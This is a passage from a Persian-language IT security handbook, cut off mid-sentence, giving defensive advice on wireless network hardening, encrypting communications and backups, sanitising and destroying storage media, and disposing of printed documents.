‫ﺍﺯ ﺑﻜﺎﺭ ﺑﺮﺩﻥ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺣﺘﻤﹰﺎ ﺑﺎﻳﺪ ﻳﻚ ﺷﺒﻜﻪ ﺑﻲﺳﻴﻢ ﺑﺴﺎﺯﻳﺪ‪ ،‬ﺗﻤﺎﻡ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻤﻨﻲ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﺩﻓﺎﻉ‬ ‫•‬
‫ﺩﺭ ﻋﻤﻖ )ﻣﺜﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﺩﻳﻮﺍﺭﻩ ﺁﺗﺶ‪ ،٦٠‬ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﭘﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ‪ ،٦١SSID‬ﺻﺎﻓﻲﻫﺎﻱ ‪ ،MAC‬ﻭ‪ (...‬ﺭﺍ ﺩﺭ ﺁﻥ ﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ‬
‫ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺍﻳﻤﻨﻲ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻣﻮﺯﺵ ﺩﻫﻴﺪ ﺩﺭ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﻫﻤﻴـﺸﻪ ﺍﺯ ‪ VPN‬ﻳـﺎ ﺳـﺎﻳﺮ‬
‫ﺗﻮﻧﻠﻬﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺑﻲﺳﻴﻢ‪ ٦٢‬ﺭﺍ ﺧﺎﺭﺝ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ )ﻳﺎ ﻣﻴﺎﻥ ﺩﻭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ( ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺣﻔﺎﻇﺖ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﻴﺸﻪ ﺑﺎ ﺍﻳﻦ ﻓﺮﺽ ﻛﻪ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺷـﻤﺎ ﺗﺤـﺖ‬ ‫•‬
‫ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﺗﻤﺎﻡ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻻﺯﻡ ﺑﺸﻤﺎﺭﻳﺪ‪ .‬ﻭﻗﺘﻲ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴﺴﺖ‪ ،‬ﺣﺪﺍﻗﻞ ﻫﻤﻪ ﺗﺮﺍﻓﻴﻚ ﺣـﺴﺎﺱ‬
‫ﺷﺒﻜﻪ )ﻣﺜﻞ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺧﺪﻣﺎﺕ ﺭﺍﻩ ﺩﻭﺭ( ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ‪.‬‬

‫ﺣﻔﺎﻇﺖ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳﺪ ﭘﻴﺸﻨﻴﺎﺯ ﻫﺮ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ -‬ﺍﻳﻤﻦ ﻳﺎ ﻏﻴﺮ ﺍﻳﻤﻦ ‪ -‬ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺩﺭ ﻧﻮﺍﺭﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﺑﺴﻴﺎﺭ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ‪ .‬ﺣﺪﺍﻗﻞ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻛﻪ ﺑﻪ ﻃﻮﺭ ﻣﻌﻤﻮﻝ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻳﺘﺎﻥ ﻣﺤﻔﺎﻇـﺖ ﻛﻨﻴـﺪ‪.‬‬
‫ﻫﻴﭻ ﻭﻗﺖ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻧﺎﺣﻴﺔ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻣﻲ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻧﻜﻨﻴﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻣﺤﻠﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﻫﺴﺘﻨﺪ )ﺑﻬﺘـﺮ‬
‫ﺍﺳﺖ ﺟﺎﻳﻲ ﺧﺎﺭﺝ ﺍﺯ ﻣﺤﻞ ﻧﮕﻬﺪﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺘﺎﻥ ﺑﺎﺷﺪ( ﻧﮕﻬﺪﺍﺭﻳﺪ‪ ،‬ﻭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﺑﻪ ﭼﻪ ﻛﺴﻲ ﺍﻋﺘﻤﺎﺩ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺯ ﻣﺤﻠـﻲ ﺑـﻪ ﻣﺤـﻞ‬
‫ﺩﻳﮕﺮ ﺣﻤﻞ ﻛﻨﺪ‪.‬‬
‫ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻗﺒﻞ ﺍﺯ ﻧﻮﺷـﺘﻪﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﭘـﺸﺘﻴﺒﺎﻥ‪ ،‬ﺁﻧﻬـﺎ ﺭﺍ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻛﻨﻴـﺪ‪.‬‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺍﻣﻜﺎﻥ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﺷﺪﻥ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻳﺎ ﻧﻮﺍﺭﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﻣـﺴﺮﻭﻗﻪ ﺭﺍ ﺑـﺮﺍﻱ ﺭﻗﻴـﺐ‬
‫ﻛﺎﻫﺶ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺰ ﻣﺤﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺗﺎ ﻫﻢ‬
‫ﻣﻬﺎﺟﻢ ﻧﺘﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﻴﺎﺑﺪ‪ ،‬ﻭ ﻫﻢ ﺩﺭﺻﻮﺭﺕ ﺗﻌﻮﻳﺾ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻛﻠﻴﺪ ﺷﻤﺎ ﮔﻢ ﻧﺸﻮﺩ‪.‬‬
‫ﻼ ﻧﻮﺍﺭ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻧﺴﺒﺖ ﺑـﻪ ﻓﺮﺁﻳﻨـﺪﻱ‬ ‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺎﻳﮕﺎﻧﻲﻫﺎ ﺑﻌﻠﺖ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻄﻲ ﺁﺭﺍﻡ ﺁﺭﺍﻡ ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻣﻮﺳﻮﻡ ﺑﻪ ‪ print through‬ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻴﺪﺍﻧﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻳـﻚ ﻗـﺴﻤﺖ ﭘﻴﭽﻴـﺪﻩ ﺷـﺪﻩ ﺑـﻪ ﺩﻭﺭ ﻗﺮﻗـﺮﺓ ﻧـﻮﺍﺭ‪ ،‬ﺭﻭﻱ‬
‫ﻻﻳﻪﻫﺎﻱ ﺯﻳﺮﻳﻦ ﺍﺛﺮ ﻣﻲﮔﺬﺍﺭﻧﺪ‪ .‬ﺗﻨﻬﺎ ﺭﺍﻩ ﺍﻳﻨﻜﻪ ﺑﻔﻬﻤﻴﻢ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ ﻳﺎ ﻧﻪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻫـﺮ ﺍﺯ‬
‫ﭼﻨﺪﮔﺎﻩ ﺑﺮﺭﺳﻲ ﻛﻨﻴﻢ‪.‬‬

‫ﺁﺩﺭﺱ ﻓﻴﺰﻳﻜﻲ ﺛﺎﺑﺖ ﻫﺮ ﮔﺮﻩ ﺩﺭ ﺷﻜﺒﻪ‬ ‫‪۵۹‬‬


‫‪60‬‬ ‫‪Firewall‬‬
‫‪61‬‬ ‫‪SSID Broadcasts‬‬
‫‪62‬‬ ‫‪Wireless Access Point‬‬
‫‪٢٨٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻳﻚ ﻣﺸﻜﻞ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ‪ ،‬ﺑﺮﭼﺴﺐﺯﻧﻲ ﻭ ﺻﻮﺭﺕ ﺑﺮﺩﺍﺭﻱ ﻧﺎﻣﻨﺎﺳﺐ ﺍﺯ ﺭﺳﺎﻧﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﺮ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﮔـﺬﺍﺭﻱ‬
‫ﻼ ﻣﺴﺘﻨﺪﺳﺎﺯﻱ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻳﺎ ﻓﻬﺮﺳﺖﺑﺮﺩﺍﺭﻱ ﻛﻪ ﻣﺆﺛﺮ ﻣﻲﺩﺍﻧﻴﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ‪ ،‬ﻣﺸﺮﻭﻁ ﺑﺮ ﺍﻳﻨﻜﻪ ﻳﻜﻲ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻧﻤﻮﺩﻩ ﻭ ﻛﺎﻣ ﹰ‬

‫ﭘﺎﻛﺴﺎﺯﻱ ﺭﺳﺎﻧﻪ ﻗﺒﻞ ﺍﺯ ﺍﻧﻬﺪﺍﻡ‬


‫ﻼ ﺑـﻪ ﻃـﻮﺭ ﻛﺎﻣـﻞ ﭘـﺎﻙ‬
‫ﻭﻗﺘﻲ ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ‪ ،‬ﺩﻳﺴﮑﻬﺎﻱ ﻓﺸﺮﺩﻩ‪ ،‬ﻳﺎ ﻧﻮﺍﺭﻫﺎ ﺭﺍ ﺍﺯ ﺭﺩﻩ ﺧﺎﺭﺝ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺳﺎﻧﻪ ﻗـﺒ ﹰ‬
‫ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﭘﺎﻛﺴﺎﺯﻱ‪ ٦٣‬ﻧﺎﻡ ﺩﺍﺭﺩ‪ .‬ﺣﺬﻑ ﻣﻌﻤﻮﻟﻲ ﻭ ﺳﺎﺩﺓ ﻳﻚ ﻓﺎﻳﻞ ﻛﻪ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺷﻤﺎ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺎﻳـﻞ‬
‫ﻻ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﺩﺍﺩﺓ ﺍﺻﻠﻲ ‪ -‬ﻭ ﮔﺎﻫﻲ ﻛﻞ ﻓﺎﻳﻞ ‪ -‬ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺮﻣﻴﻢ ﺷﻮﻧﺪ‪ .‬ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﺑﺎﻳـﺪ ﺑـﺎ‬ ‫ﺭﺍ ﺍﺯ ﺑﻴﻦ ﻧﻤﻲﺑﺮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺼﻮﺹ ﻛﻪ ﺑﻄﻮﺭ ﺧﺎﺹ ﺑﺮﺍﻱ ﻫﺮ ﻧﻮﻉ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﭘﺎﻛﺴﺎﺯﻱ ﺷﻮﺩ‪.‬‬

‫ﺩﺭ ﻣﻮﺭﺩ ﻧﻮﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﭘﺎﻙﻛﻨﻨﺪﻩ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻳﺎ ﭘﺎﻛﺴﺎﺯ ﺍﻧﺒﻮﻩ ‪ -‬ﻳﻚ ﻭﺳﻴﻠﺔ ﺩﺳﺘﻲ ﺍﻟﻜﺘﺮﻭﻣﻐﻨﺎﻃﻴﺴﻲ ﻛـﻪ ﺩﺍﺭﺍﻱ ﻣﻴـﺪﺍﻥ‬
‫ﻣﻐﻨﺎﻃﻴﺴﻲ ﻗﻮﻱ ﺍﺳﺖ ‪ -‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺍﻃﻼﻋﺎﺕ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻧﺒﻮﻩ ﭘﺎﻛﺴﺎﺯﻱ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺁﻧﻘﺪﺭ ﻣﺠﺪﺩﹰﺍ ﺑﺨﻮﺍﻧﻴﺪ ﺗﺎ ﺑﻔﻬﻤﻴﺪ ﺑـﺮﺍﻱ‬
‫ﻣﺤﻮ ﻧﻤﻮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﭼﻨﺪ ﺑﺎﺭ ﭘﺎﻙ ﻛﺮﺩﻥ ﺁﻧﻬﺎ ﺑﻪ ﺍﻳﻦ ﺭﻭﺵ ﻻﺯﻡ ﺍﺳﺖ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺭﺳﺎﻧﻪ ﻧﻮﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺣﺘﻲ ﻣﺤﺘﻮﻳﺎﺕ ﺭﺳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ ﻗﺎﺑﻞ ﻧﻮﺷﺘﻦ ﻫـﺴﺘﻨﺪ ﺭﺍ ﻧﻴـﺰ ﭘـﺎﻙ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﺛﺮﺑﺨﺸﻲ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺍﺯ ﻳﻚ ﻧﻮﻉ ﺭﺳﺎﻧﻪ ﺑﻪ ﻧﻮﻉ ﺩﻳﮕﺮ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺎﺯﻫﻢ ﻣﺎﻧـﺪﻩﻫـﺎﻳﻲ ﺍﺯ‬
‫ﺧﻮﺩ ﺑﺮﺟﺎ ﺑﮕﺬﺍﺭﺩ‪ .‬ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺷﺎﻳﺪ ﻧﺎﺑﻮﺩ ﻛﺮﺩﻥ ﻓﻴﺰﻳﻜﻲ ﺍﺭﺟﺢ ﺑﺎﺷﺪ‪.‬‬
‫ﻛﻮﺭﻩﻫﺎﻱ ﺯﺑﺎﻟﻪﺳﻮﺯﻱ ﻭ ﺣﻤﺎﻡﻫﺎﻱ ﺍﺳﻴﺪﻱ ﺑﺮﺍﻱ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﻧﻮﺍﺭﻫﺎ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺯ ﻧﻈﺮ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻂ ﺯﻳﺴﺖ ﻗﺎﺑﻞ ﻗﺒـﻮﻝ‬
‫ﻧﻤﻲﺑﺎﺷﻨﺪ‪ .‬ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﺷﻜﺴﺘﻦ ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﻭ ﺑﺴﺘﻪﻫـﺎﻱ ‪ floppy‬ﺗـﺮﺟﻴﺢ ﺩﺍﺩﻩ ﻣـﻲﺷـﺪ‪ ،‬ﺍﻣـﺎ ﺑـﺎ ﺍﻓـﺰﺍﻳﺶ ﺣﺠـﻢ ﺩﻳـﺴﻜﻬﺎ‪،‬‬
‫ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﺑﺎﻳﺪ ﺑﻪ ﻗﻄﻌﺎﺕ ﻛﻮﭼﻜﺘﺮ ﻭ ﻛﻮﭼﻜﺘﺮﻱ ﺷﻜﺴﺘﻪ ﺷﻮﻧﺪ ﺗﺎ ﺍﻣﻜﺎﻥ ﺗﺤﻠﻴﻞ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻲ ﻣﻮﺍﺩ ﺣﺎﺻﻠﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺮﺍﻱ‬
‫ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﺩﺳﺘﮕﺎﻩ ﭘﺎﻙﻛﻨﻨﺪﺓ ﻣﻐﻨﺎﻃﺴﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭﻟﻲ ﻫﺰﻳﻨﺔ ﺁﻥ ﺑﺎﻻﺳﺖ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺑﺘﺪﺭﻳﺞ ﺭﻭﺷﻬﺎﻱ ﭘﺎﻛﺴﺎﺯﻱ ﻭ ﺍﻧﻬﺪﺍﻡ ﻓﻴﺰﻳﻜـﻲ‬
‫ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺗﻜﻨﻴﻜﻬﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﻭﺍﺝ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﻳﻚ ﺭﻭﺵ ﺭﺍﻳﺞ ﭘﺎﻛﺴﺎﺯﻱ‪ ،‬ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﻞ ﺩﻳﺴﻚ ﻳﺎ ﻧﻮﺍﺭ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﻣﺤﺮﻣﺎﻧﻪ ﻳﺎ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺳﺮﻭﻛﺎﺭ ﺩﺍﺭﻳـﺪ‪ ،‬ﺷـﺎﻳﺪ‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﻳﻚ ﻧﻮﺍﺭ ﻳﺎ ﺩﻳﺴﻚ ﺭﺍ ﭼﻨﺪﺑﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﻨﻴﺪ‪ ،‬ﭼﻮﻥ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺍﺩﻩ ﺍﺯ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺷﺪﻩﺍﻧﺪ‬
‫ﻻ ﻧﻮﺍﺭﻫﺎ ﺳﻪ ﺑﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﻳﻜﺒﺎﺭ ﺑﺎ ﺑﻠﻮﻛﻬﺎﻱ "ﺻﻔﺮ"‪ ،‬ﻳﻜﺒﺎﺭ ﺑﺎ ﺑﻠﻮﻛﻬـﺎﻱ "ﻳـﻚ"‪ ،‬ﻭ ﻳﻜﺒـﺎﺭ ﻫـﻢ ﺑـﺎ ﺍﻋـﺪﺍﺩ‬
‫ﺑﺎﺯﻳﺎﻓﺖ ﺷﻮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺗﺼﺎﺩﻓﻲ‪ .‬ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﻲﺗﻮﺍﻥ ﻧﻮﺍﺭ ﺭﺍ ﭼﻨﺪﺑﺎﺭ ﺍﺯ ﺍﺭﺓ ﻧﻮﺍﺭﻱ ﻋﺒﻮﺭ ﺩﺍﺩ ﺗﺎ ﺑﻪ ﻫﺰﺍﺭﺍﻥ ﻗﻄﻌﺔ ﻛﻮﭼﻚ ﭘﻼﺳﺘﻴﻜﻲ ﺗﺒﺪﻳﻞ ﺷﻮﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﭘﺎﻛﺴﺎﺯﻱ ﺍﺳﻨﺎﺩ ﻣﻜﺘﻮﺏ‬


‫ﺍﻃﻼﻋﺎﺕ ﻣﻜﺘﻮﺏ ﻛﻪ ﺭﺍﻫﻲ ﺯﺑﺎﻟﻪﺩﺍﻧﻲ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻣﺠﺮﻣﺎﻥ ﻳﺎ ﺭﻗﺒﺎ ﺑﻪ ﻛﺎﺭ ﺑﻴﺎﻳﺪ‪ .‬ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺷﺎﻣﻞ ﻧﺴﺨﻪﻫﺎﻱ ﭼﺎﭘﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ )ﺍﺯ ﺟﻤﻠﻪ ﻧﺴﺨﻪﻫﺎﻱ ﻧﺎﻗﺺ(‪ ،‬ﺧﻼﺻﻪﻫﺎ‪ ،‬ﺍﺳﻨﺎﺩ ﻃﺮﺍﺣﻲ‪ ،‬ﻣﺘﻦ ﺍﻭﻟﻴﺔ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺍﺳﻨﺎﺩ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ‪ ،‬ﺧﺒﺮﻧﺎﻣﻪﻫـﺎﻱ‬
‫ﺩﺍﺧﻠﻲ‪ ،‬ﺩﻓﺘﺮﭼﺔ ﺗﻠﻔﻦ ﻭ ﻛﺘﺎﺑﻬﺎﻱ ﺭﺍﻫﻨﻤﺎﻱ ﺷﺮﻛﺖ ﻭ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺯﺑﺎﻟﻪﺩﺍﻧﻲ ﺭﻳﺨﺘـﻪ ﺷـﻮﺩ‬
‫ﺷﺎﻣﻞ ﺍﻧﻮﺍﻉ ﻧﺴﺨﻪﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﺷﻤﺎﺭﻩﻫﺎﻱ ﺳﺮﻳﺎﻝ‪ ،‬ﺳﻄﺢ ﻧﺼﺐ ﺑﻮﺩﻥ ﺍﺻﻼﺣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻭ ﻣﺎﻧﻨـﺪ ﺁﻥ ﻣـﻲﺷـﻮﺩ‪ .‬ﺍﻳـﻦ‬
‫ﺍﺳﻨﺎﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮ ﺩﺍﺭﻧﺪﻩ ﺍﺳﺎﻣﻲ ﻣﻴﺰﺑﺎﻧﻬﺎ‪ ،‬ﺷﻤﺎﺭﻩﻫﺎﻱ ‪ ،IP‬ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﺑﺮﺍﻱ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﺎﺷـﻨﺪ‪.‬‬
‫ﺷﻨﻴﺪﻩ ﺷﺪﻩ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺷﺮﻛﺘﻬﺎ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﺎﻣﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺩﻳﻮﺍﺭﻩ ﺁﺗﺶ ﻭ ﺿﻮﺍﺑﻂ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ‪ - ٦٤‬ﻳﻚ ﻣﻌﺪﻥ ﻃﻼ ﺑﺮﺍﻱ ﻛـﺴﻲ ﻛـﻪ‬
